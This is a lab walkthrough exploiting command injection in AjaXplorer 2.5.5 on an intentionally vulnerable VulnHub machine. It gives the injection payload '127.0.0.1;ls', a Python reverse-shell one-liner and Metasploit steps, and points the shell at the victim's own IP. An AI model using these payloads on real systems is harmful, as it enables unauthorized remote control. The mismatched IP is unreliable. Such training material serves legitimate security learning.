Pentester Academy Command Injection ISO: AjaXplorer 2.5.5 Exploitation
Introduction:
The Pentester Academy has created a virtual machine that consists of various vulnerable real-world applications. These applications are vulnerable to the "Command Injection" vulnerability.
To download the virtual machine, click on the following link:
What should you learn next?
https://www.vulnhub.com/entry/command-injection-iso-1,81/
http://www.pentesteracademy.com/course?id=12
If you are new to the term "Command Injection," click on the below link for a primer: https://www.infosecinstitute.com/resources/penetration-testing/pentester-academy-command-injection-iso-basilic-1-5-14-exploitation/
In this article, a real-world application framework AjaXplorer version 2.5.5. is attempted to be exploited.
AjaXplorer is a web application interface that performs the task of synching and accessing files over a Local Area Network (LAN) or a Wide Area Network (WAN). It is accessed through any of the major web browsers. For more details on the functioning of AjaXplorer click on the below link: https://www.techrepublic.com/blog/tr-dojo/access-and-sync-folders-with-ajaxplorer/
The first part of the exploitation process is done by configuring the network first, which is discussed next.
Network Configuration:
Make sure both Kali (Attacker) and Command injection OS (Victim) Network adapters are configured to the NAT as shown below.
The IP Address of the attacker machine after natting is illustrated below:
The attacking machine has an IP Address of 192.168.31.142. As a result, the IP Address of the victim machine will also be on the same subnet because both them are netted.
Network Reconnaissance:
To find the IP Address of the victim machine a host identification scan is done on the subnet using nmap with the following command:
root@justpentest#nmap -sn 192.168.31.1/24
Nmap will perform a full subnet scan and give a compiled list of the live hosts on that subnet.
This will now be confirmed by entering the IP Address of 192.168.31.145 into the web browser.
As can be seen in the above screenshot, the "Command Injection ISO" is being accessed and, as a result, a list of all the vulnerable applications installed can be seen.
The next step is to now actually exploit the AjaXplorer 2.5.5 command injection vulnerability.
Information Gathering:
The AjaXplorer be accessed by clicking on it, as demonstrated in the screenshot below:
The explorer up and running, and now the exploitation process can be initiated.
First, information about the AjaXplorer and related exploits for the version 2.5.5 was researched by using Google.
The following exploit URL on exploit dB can be seen by clicking on this link:
https://www.exploit-db.com/exploits/21993
The following line of code is then compiled, as illustrated below:
This source code describes the path of the vulnerable page.
The next step is to now browse further into the URL, as can be seen below:
As can be seen above, the page is now up and running. The page has an input field where an IP address is supposed to be entered.
Once it is entered, the AjaXplorer will try to connect to the SSH server onto the appropriate IP address.
For testing purpose, I have entered my localhost IP Address to confirm the response.
As seen above, the IP Address of 127.0.0.1 has been entered to test for the SSH.
Once this has been accomplished, the IP Address is then inputted. Now click on the "Enter" button.
As demonstrated in the screenshot up above, the "Received output: []" is blank and thus, there is a message which says, "Please install server host key …."
The AjaXplorer now accepts the IP address and then executes a system command of SSH query to check whether the host key is installed or not.
The next step to be conducted is whether the AjaXplorer is sanitizing the input before executing the system commands or not.
Exploitation:
The following payload in the input box "127.0.0.1;ls" is now executed:
Once this is sent, the response from the server can now be observed, as illustrated below:
As it can be seen from the above screenshot that the "ls" system has been launched on the server side, and thus, the list of files in the directory is returned as a response.
Once the command injection is done, different kinds of payloads can now be tested if a reverse shell can be created.
More information on the reverse shell one liner payload can be found by clicking on the below link: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Different payloads have been launched to get the reverse shell. But the payload that worked is illustrated below:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.145",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Before executing the reverse shell payload, a listener using Netcat on the attacker system is first initiated, which can be seen in the screenshot below:
The final payload is now executed to get the reverse shell and is illustrated below:
127.0.0.1; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.145",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Once this payload has been executed on the server side, the Netcat listener now gets a shell connection as shown below:
As a result, one can now perform command injection on AjaXplorer manually and obtain the remote code execution on the server side.
Exploitation with Metasploit:
The next step now is to perform a command injection with the Metasploit framework with the below command:
Start msfconsole
Next, the exploit that is related to the AjaXplorer in the Metasploit framework is examined by entering the following command:
msf>search AjaXplorer
As above screenshot illustrates, there is now an exploit present for the AjaXplorer which in turn further exploits the checkinstall files.
Once the appropriate exploit has been discovered, the options of which it now accepts can be seen by executing the below command:
Msf>options
As it is illustrated in the above screenshot, the command line accepts RHOST, RPORT, TARGETURI. It is important to note that all items have been properly configured except for the RHOST. The RHOST will now be configured for the exploit by executing the command lines which can be seen in the below screenshots:
Once everything has been properly configured the command injection vulnerability can thus be exploited by using Metasploit.
To exploit it, just enter the command "run."
The exploit code will exploit the vulnerability and thus return a reverse shell illustrated in the below screenshot.
Finally, the command line injection vulnerability on AjaXplorer 2.5.5 has been exploited, and as a result, the remote code execution on the server side was thus obtained.
How to prevent command injection:
- Software developers should implement the proper input validation; special characters should not be accepted or processed throughout the application.
- The system call function should not be used anywhere in the backend programming of any type or kind of application.
- The application should be executed and run with least privileges assigned.
Conclusion:
Organizations utilize various web application frameworks for different purposes and objectives. Some of them may have Security vulnerabilities, but once exploited that may lead to a complete takeover of the entire framework. Once the Cyber attacker has control over one system on the network, he or she may then pivot to another network to gain control of it or try to compromise the domain controller.
Businesses and corporations should always be proactive about patching of all the open source software related modules, such as the applications, framework, libraries, and packages.
References:
https://www.exploit-db.com/exploits/21993
Become a Certified Ethical Hacker, guaranteed!
Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.
https://www.techrepublic.com/blog/tr-dojo/access-and-sync-folders-with-ajaxplorer/